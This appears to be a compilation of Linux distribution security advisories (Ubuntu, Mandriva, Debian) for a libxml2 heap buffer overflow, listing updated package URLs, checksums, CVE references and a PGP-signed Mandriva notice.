http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_amd64.deb Size/MD5: 872964 86ab686a437dd9ed2b1ea08dbd5d9ba1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_amd64.deb Size/MD5: 297976 8acf0cdf5242fd3e6edd957db9e19c28 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_i386.deb Size/MD5: 904990 88fe3df363f8829fcfb9a0ff42aa4e96 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_i386.deb Size/MD5: 676490 641845452580108e68afbd1605af5744 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_i386.udeb Size/MD5: 533328 3e0d900bd1898de03a78fd408800d88e http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_i386.deb Size/MD5: 34042 2061451c337e1b12f73f9f91125aeda2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_i386.deb Size/MD5: 786106 664fc7281611ad8b19e5f0b62284878f http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_i386.deb Size/MD5: 796320 1d531f46ab809a0f58ccdcf75f706ea5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_i386.deb Size/MD5: 262966 d26ec52d81b118a64f13657db427f858 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_lpia.deb Size/MD5: 931054 830e464f765c3109497514d96295c932 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_lpia.deb Size/MD5: 679546 6f6ee1fe040963315471c2a2a15064d6 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_lpia.udeb Size/MD5: 529214 af124b039059f2f24f31c50fc8fbf48f http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_lpia.deb Size/MD5: 34488 ef4c4ea4e96d66c6d5c36e2645379915 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb Size/MD5: 781436 ae5efc717942777be05db9c550d5ddd5 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_lpia.deb Size/MD5: 788580 c16e8d94ecb5f1a14655fc4d40671f97 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_lpia.deb Size/MD5: 259630 143a179bfbcff152d9f33c424ea80229 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 923448 d3ca8a5978632bec93151a892072b5c4 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 776284 92d1fb876bb167fccee4e5a6a82e8169 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_powerpc.udeb Size/MD5: 564078 9d75d8f965c320fd17dc2c420aa6e325 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 42060 8bedb52b8485e7b65b930a39a671cbd8 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 816678 55d6f855ea9b7b14f2ce449079360f80 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 841354 b66c89a166c8a92ed136f77e2693249b http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_powerpc.deb Size/MD5: 285362 adc160daa3848983f4ddb678c3345199 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 826326 f596d405cff24bfa70d8c2ff81e3439b http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 719830 b0cb8e2bbbec82604b5a562f3e446f78 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.31.dfsg-2ubuntu1.4_sparc.udeb Size/MD5: 541066 f5796b6b3175b740eb55ab32887c98f1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 36190 1e5ae0d677b95e4f5b69c86ab7207c04 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 793408 c10a54dbfe118a255b353b59fee0c895 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 807914 3566e097583445477cad63cd721424f1 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.31.dfsg-2ubuntu1.4_sparc.deb Size/MD5: 277520 b0c2ed5aafa41ff970a5d8c40a12d02d Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.diff.gz Size/MD5: 84498 bc3004e4fd1e98246801b2a5741be0f1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2.dsc Size/MD5: 1494 5a25281495f4e6650a45f45a5a8526d2 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz Size/MD5: 3425843 bb11c95674e775b791dab2d15e630fa4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-4ubuntu1.2_all.deb Size/MD5: 1308242 3aa37d0a971702bda21165e2744d3b15 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 1014608 676fed67244fe42800b527d2d654365f http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 777674 72fd0dc6223b0708f936bfbf830b42a4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_amd64.udeb Size/MD5: 607400 82a0a91ff27913e1284ae7799156b9a5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 37346 b71638a425beef5adb16962d2dbf83f8 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 863410 2141203bc6e460099878831efdc9de8e http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 858904 3143613cc83f8f3b3fc171291e48f30c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_amd64.deb Size/MD5: 296128 4f123d82f7393dc6271adee9b0b2154b i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 966962 48d67569f459f88564f282c5c7603eca http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 701786 f31b1ec9b00b32aef5dab08de74c1ca5 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_i386.udeb Size/MD5: 563618 6c10444d19aa3010ec0b6afc46631442 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 33908 218bd1ab9dbed3bb7e56db1f1ac74a6a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 819242 f2e5722dc46494b105d2e171a7ab8230 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 782502 c6a12f97a9d05c420e87d98f3cebe292 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_i386.deb Size/MD5: 261340 c1e353abc1bdf4c56b856228ea92e3ce lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 994030 e6260d0cfcac28075fcbe72036374dc1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 697648 2e04c962dc20e83f635a5bf06fb87691 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_lpia.udeb Size/MD5: 553402 8998361080659f8d3175d3621261805a http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 34092 da760a43ac9492e508c6dc6c85499a95 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 808888 d3708ffd4d87a2c48c6c37badb602ec5 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 776836 ff4dee115d09816a99b2c7ea63e4fd10 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_lpia.deb Size/MD5: 257710 6e2cf4776d778dc7ce2d2a7c098c5bd7 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 985370 5f1c540dbfecf08d6ccc22798beb7d0d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 793178 980f65e0877f36d1c51241ca6e8a4e79 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_powerpc.udeb Size/MD5: 582030 439fe7ebaebd3e5e3c9ca5b323595da6 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 40426 648c47236b411a6b5ccbbe4ca4671af7 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 837942 7a59d92fe6c31895aadc67df56e404b2 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 822784 44a72a4996bca847bea424ad1db4d03b http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_powerpc.deb Size/MD5: 283028 9423c0b24aab87ffac1d85615282e38d sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 872662 fcc9c2574a5f8f9aeee5be43cedd9542 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 730988 dab6026cfeee8b30a3d7d7a989621cc1 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-4ubuntu1.2_sparc.udeb Size/MD5: 551174 de8a4e5e3c69eda8a888e2a4be0d8771 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 36538 b1c42f5d79806ca0ddb842d6e46589e4 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 807300 2ec0838cfed794ad0dfba8e6c2f8f5a6 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 795578 5177c5c668b1cb6ab972a42ba74ce69b http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-4ubuntu1.2_sparc.deb Size/MD5: 275720 848f0e32688509c20e716bf56854b3c2 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.diff.gz Size/MD5: 86115 e8ae94cf06df5aa69bcb4e9e3478dc3a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2.dsc Size/MD5: 1494 59db95aea21b88b40de41b4eb6286204 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg.orig.tar.gz Size/MD5: 3425843 bb11c95674e775b791dab2d15e630fa4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-doc_2.6.32.dfsg-5ubuntu4.2_all.deb Size/MD5: 1309904 8a177134aefda1c1803ee8cea7876987 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 1014666 7eecb75acf8cfe96f0d8ad00dc6cd0f7 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 777666 303a6a64d87e0666177f9ee63cf1a03c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_amd64.udeb Size/MD5: 607592 f0abee0ba9c7cac159aa282ff04b968d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 37356 e60cf6a423c951786da162ffe21132a1 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 864536 fd1367706366bfd805f692c39f331835 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 863456 0e646ecc8d3e8e72fc65739a4bae3de9 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_amd64.deb Size/MD5: 359004 6541b0c12852c3e490ddb20c06448eae i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 967152 3bc76bac8a99f2bceca5169cf9394f2c http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 701712 b3aa303a9b2fcdcbdcb62595a6876f86 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_i386.udeb Size/MD5: 563692 fbda90721b32837d401f72def5bae5d4 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 33904 a3323cb518af641c59ea45369a65746f http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 820722 d26fe8acb0a5aee307d06edae3e7e28a http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 785386 afdcafaa8bac5e88aa4a13e0d749b2ea http://security.ubuntu.com/ubuntu/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_i386.deb Size/MD5: 324412 bae919ee044ef9aaf19656b9d1976b19 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 994408 53e4d8355d376154e295df19d3a3c60d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 697522 5222a56651f77e522ca0ad1c6d6d5de6 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_lpia.udeb Size/MD5: 553434 48f46f951b7ebc278e84ad661d306f19 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 34098 60966a769f8d75d8bc8253c687e38244 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 810434 585824abaa30b7726f8e7beeae6150eb http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 778354 6588b53390d8a294fc18ab6624e6c7c1 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_lpia.deb Size/MD5: 320608 cb34801b64a53678cc553625fec3feaf powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 985248 ecf8b6d8401aebd949116cb0169a96fe http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 793242 1fc757dad96c16d285df20a5137af4c6 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_powerpc.udeb Size/MD5: 582210 87a282cc9ab3bf5af1015ce0624d01d9 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 40434 3e24add8c4c0aaf0b7931dd185394d6d http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 839218 0b75a09404be80b49058058c2aa6e746 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 825710 58709b2af622ff835b15f799cd47fcfe http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_powerpc.deb Size/MD5: 344720 c07c4729d2191cf51d85654a83e8faf2 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 872512 b6f95a836cabc34e1266b76cc250a9e0 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-dev_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 730870 607909857dea94afe8102a7131595252 http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-udeb_2.6.32.dfsg-5ubuntu4.2_sparc.udeb Size/MD5: 551000 7fbe08e3223c9543645eadb4b9e0167a http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2-utils_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 36486 c3540c5aadb1adc3f85f6276a1980d0c http://ports.ubuntu.com/pool/main/libx/libxml2/libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 807954 a3ac3191b768e4b6e1e7b1c279b26a13 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2-dbg_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 798558 dd9c4b6bf81302a938f71ed0f9cf47c8 http://ports.ubuntu.com/pool/main/libx/libxml2/python-libxml2_2.6.32.dfsg-5ubuntu4.2_sparc.deb Size/MD5: 338152 674bae887b0ae673dd4732498c5a738c . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:192 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libxml2 Date : September 11, 2008 Affected: 2007.1, 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A heap-based buffer overflow was found in how libxml2 handled long XML entity names. The updated packages have been patched to prevent this issue. As well, the patch to fix CVE-2008-3281 has been updated to remove the hard-coded entity limit that was set to 5M, instead using XML entity density heuristics. Many thanks to Daniel Veillard of Red Hat for his hard work in tracking down and dealing with the edge cases discovered with the initial fix to this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3281 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3529 _______________________________________________________________________ Updated Packages: Mandriva Linux 2007.1: 9250adec77a5118119d5000f2305540f 2007.1/i586/libxml2-2.6.27-3.4mdv2007.1.i586.rpm 103dba08606f0038f3a9f4107ceba442 2007.1/i586/libxml2-devel-2.6.27-3.4mdv2007.1.i586.rpm a388bf596ef6725fb5baadb4e056a0bd 2007.1/i586/libxml2-python-2.6.27-3.4mdv2007.1.i586.rpm d2333e42a538101e36eab7d12467e08b 2007.1/i586/libxml2-utils-2.6.27-3.4mdv2007.1.i586.rpm 94a25c63f54693b7ac289223a6a3a687 2007.1/SRPMS/libxml2-2.6.27-3.4mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 343f8656039b69716fe712eeb2d1bf4e 2007.1/x86_64/lib64xml2-2.6.27-3.4mdv2007.1.x86_64.rpm 320d8dd8245f5ec6db46bedaf07afb3e 2007.1/x86_64/lib64xml2-devel-2.6.27-3.4mdv2007.1.x86_64.rpm fb6f52df6831cda42db46502cc761475 2007.1/x86_64/lib64xml2-python-2.6.27-3.4mdv2007.1.x86_64.rpm 8440fc08fee99f18a81a32035fac166a 2007.1/x86_64/libxml2-utils-2.6.27-3.4mdv2007.1.x86_64.rpm 94a25c63f54693b7ac289223a6a3a687 2007.1/SRPMS/libxml2-2.6.27-3.4mdv2007.1.src.rpm Mandriva Linux 2008.0: c53b40d9c7ebec036f9175c8f4e87b3b 2008.0/i586/libxml2_2-2.6.30-1.4mdv2008.0.i586.rpm 4a4ed97086b52cab3bbd34fe4d7003a0 2008.0/i586/libxml2-devel-2.6.30-1.4mdv2008.0.i586.rpm d3898465dc2797a2b20be8310dd4f484 2008.0/i586/libxml2-python-2.6.30-1.4mdv2008.0.i586.rpm 34c524fa03b470093bd0b0c679bcb9c4 2008.0/i586/libxml2-utils-2.6.30-1.4mdv2008.0.i586.rpm 2dc2f4732992e27aea4c5a098c631ae8 2008.0/SRPMS/libxml2-2.6.30-1.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 20ac98b346a1f18b90504cb623c530d8 2008.0/x86_64/lib64xml2_2-2.6.30-1.4mdv2008.0.x86_64.rpm fd5907e801bf4f64ee79d097fcaec2b6 2008.0/x86_64/lib64xml2-devel-2.6.30-1.4mdv2008.0.x86_64.rpm 20f45401e501b9639a9b53d82a4e031f 2008.0/x86_64/libxml2-python-2.6.30-1.4mdv2008.0.x86_64.rpm 22be20e194ba2177a47d831ee8c82f47 2008.0/x86_64/libxml2-utils-2.6.30-1.4mdv2008.0.x86_64.rpm 2dc2f4732992e27aea4c5a098c631ae8 2008.0/SRPMS/libxml2-2.6.30-1.4mdv2008.0.src.rpm Mandriva Linux 2008.1: 61e96824adc6e61b2764bb3a85e2e76d 2008.1/i586/libxml2_2-2.6.31-1.3mdv2008.1.i586.rpm 6d0cc51d32c7b6ecd609250aad302034 2008.1/i586/libxml2-devel-2.6.31-1.3mdv2008.1.i586.rpm 1e7c4ddd30677789de05cc464dde9790 2008.1/i586/libxml2-python-2.6.31-1.3mdv2008.1.i586.rpm edd477e34b08f94956eeedd387b5e509 2008.1/i586/libxml2-utils-2.6.31-1.3mdv2008.1.i586.rpm b1078a83185c1c97fada7ea5e97df753 2008.1/SRPMS/libxml2-2.6.31-1.3mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 9d25e809ad31decb111a38301b2a74c1 2008.1/x86_64/lib64xml2_2-2.6.31-1.3mdv2008.1.x86_64.rpm f35af82dffc02628edb1ce03113c3ba0 2008.1/x86_64/lib64xml2-devel-2.6.31-1.3mdv2008.1.x86_64.rpm 5819b393de9ff05be4d670c8e5d36080 2008.1/x86_64/libxml2-python-2.6.31-1.3mdv2008.1.x86_64.rpm fb670bfb1a1673f99f3c3fc3a72b7777 2008.1/x86_64/libxml2-utils-2.6.31-1.3mdv2008.1.x86_64.rpm b1078a83185c1c97fada7ea5e97df753 2008.1/SRPMS/libxml2-2.6.31-1.3mdv2008.1.src.rpm Corporate 3.0: 82e733037c09b4b7770f5325c7ed1325 corporate/3.0/i586/libxml2-2.6.6-1.5.C30mdk.i586.rpm d66da7916f188883fd164cb250431bba corporate/3.0/i586/libxml2-devel-2.6.6-1.5.C30mdk.i586.rpm 5df28181424b19132bbff6afa872475a corporate/3.0/i586/libxml2-python-2.6.6-1.5.C30mdk.i586.rpm f7a86c3be6e4926fa101386a9cbbcbdd corporate/3.0/i586/libxml2-utils-2.6.6-1.5.C30mdk.i586.rpm c64826e1b31ed0c5d4514780ecd52e2e corporate/3.0/SRPMS/libxml2-2.6.6-1.5.C30mdk.src.rpm Corporate 3.0/X86_64: 76e631bd88c68085dc2c5702235c2a99 corporate/3.0/x86_64/lib64xml2-2.6.6-1.5.C30mdk.x86_64.rpm 827f9f5bc3a1b869353e3c09879ea432 corporate/3.0/x86_64/lib64xml2-devel-2.6.6-1.5.C30mdk.x86_64.rpm caafa3371f80f084e8a945b3114b4533 corporate/3.0/x86_64/lib64xml2-python-2.6.6-1.5.C30mdk.x86_64.rpm e37a70f9cd13a7e00982387a9ba97726 corporate/3.0/x86_64/libxml2-utils-2.6.6-1.5.C30mdk.x86_64.rpm c64826e1b31ed0c5d4514780ecd52e2e corporate/3.0/SRPMS/libxml2-2.6.6-1.5.C30mdk.src.rpm Corporate 4.0: 74eea161b5519eef6c16b2407126a847 corporate/4.0/i586/libxml2-2.6.21-3.4.20060mlcs4.i586.rpm 5d8d1e0e487022687c1c61fbaf91707e corporate/4.0/i586/libxml2-devel-2.6.21-3.4.20060mlcs4.i586.rpm d5aa677468c9e8baae074a12f6c63c00 corporate/4.0/i586/libxml2-python-2.6.21-3.4.20060mlcs4.i586.rpm d51b4b902bb911be69f6a17aeb07d8cf corporate/4.0/i586/libxml2-utils-2.6.21-3.4.20060mlcs4.i586.rpm ce28651304236296e59d6d3be5525889 corporate/4.0/SRPMS/libxml2-2.6.21-3.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 812f2ae0ffa7a72546b07bd7de174453 corporate/4.0/x86_64/lib64xml2-2.6.21-3.4.20060mlcs4.x86_64.rpm 23ae06098f957e46affa75220cac50af corporate/4.0/x86_64/lib64xml2-devel-2.6.21-3.4.20060mlcs4.x86_64.rpm 93cb252dadfadd4249062f903e604f82 corporate/4.0/x86_64/lib64xml2-python-2.6.21-3.4.20060mlcs4.x86_64.rpm aeff512a1b349108017e93633fabcf08 corporate/4.0/x86_64/libxml2-utils-2.6.21-3.4.20060mlcs4.x86_64.rpm ce28651304236296e59d6d3be5525889 corporate/4.0/SRPMS/libxml2-2.6.21-3.4.20060mlcs4.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIyaCLmqjQ0CJFipgRApioAJ9P7O5hzNQ4UuYvEIhTVLyyn9Tv9wCg4DSp mZuI5mJOfDomJXN1l5E7NSw= =tPwM -----END PGP SIGNATURE----- . This could allow the execution of arbitrary code via a malicious XML file. For the stable distribution (etch), this problem has been fixed in version 2.6.27.dfsg-5. For the unstable distribution (sid), this problem has been fixed in version 2.6.32.dfsg-4. We recommend that you 